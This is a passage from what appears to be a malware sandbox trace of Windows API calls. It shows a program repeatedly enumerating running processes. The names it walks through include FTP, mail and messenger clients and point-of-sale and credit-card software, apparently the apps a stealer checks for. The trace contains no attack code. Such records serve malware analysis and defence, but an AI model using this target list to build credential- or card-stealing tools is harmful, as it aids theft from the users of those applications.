th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0181.596] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0181.597] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0181.599] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0181.651] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0181.660] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0181.662] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0181.663] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0181.666] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0181.670] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0181.676] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0181.678] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0181.679] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0181.681] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0181.682] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0181.683] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0181.685] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0181.687] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0181.689] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0181.691] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0181.693] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0181.706] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0181.765] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0181.767] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0181.769] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0181.771] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0181.773] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0181.775] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0181.776] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0181.779] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0181.781] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0181.782] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0181.784] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0181.786] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0181.788] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0181.791] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0181.792] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0181.794] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0181.796] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0181.837] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0181.839] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0181.841] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0181.843] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0181.845] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0181.846] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0181.848] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0181.850] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0181.852] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0181.853] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0181.855] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0181.857] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0181.858] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0181.860] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0181.862] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0181.864] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0181.865] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0181.867] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0181.869] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0181.916] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0181.920] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0181.922] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0181.924] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0181.926] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.929] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0181.931] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0181.933] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.935] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0181.937] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0181.939] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0181.942] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0181.947] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0181.948] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0181.950] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.952] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0181.954] CloseHandle (hObject=0x17ec) returned 1 [0181.954] Sleep (dwMilliseconds=0x64) [0181.991] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0182.056] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.057] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0182.059] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0182.060] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.062] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0182.064] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.066] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0182.067] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0182.069] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, 